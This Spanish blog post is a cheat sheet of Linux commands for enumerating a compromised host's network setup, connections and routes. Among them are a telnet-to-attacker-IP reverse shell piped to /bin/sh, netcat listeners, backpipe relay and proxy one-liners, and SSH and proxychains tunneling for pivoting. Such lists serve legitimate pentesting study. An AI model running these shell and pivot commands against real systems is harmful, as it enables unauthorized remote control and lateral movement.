Chequeo de comunicaciones en Unix/Linux

  • Qué tarjetas de red tiene el sistema? están conectadas a otras redes?

ip a

ifconfig -a

cat /etc/network/interfaces

cat /etc/sysconfig/network

  • ¿Cuál es la configuración de red? Servidor DHCP? Servidor DNS? Puerta de enlace? firewall?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -nL
hostname
dnsdomainname

  • Qué otros usuarios y equipos están comunicándose con el sistema?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

  • direcciones, mac, rutas… están cacheadas?

arp -e
route
/sbin/route -nee

  • Escucha en tiempo real una conexión

tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

nc -lvp 4444 # Input (Commands)
nc -lvp 4445 # Ouput (Results)
telnet [ip atacante] 44444 | /bin/sh | [local ip] 44445 # usa las ips de atacantes

  • Es posible el reenvío de puertos?

ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # puerto local
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # puerto remoto
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Puerto Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

  • Es posible el tuneling? enviar comandos local y remotamente?

ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Anuncios

Deja un comentario...dicen que es gratis!

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s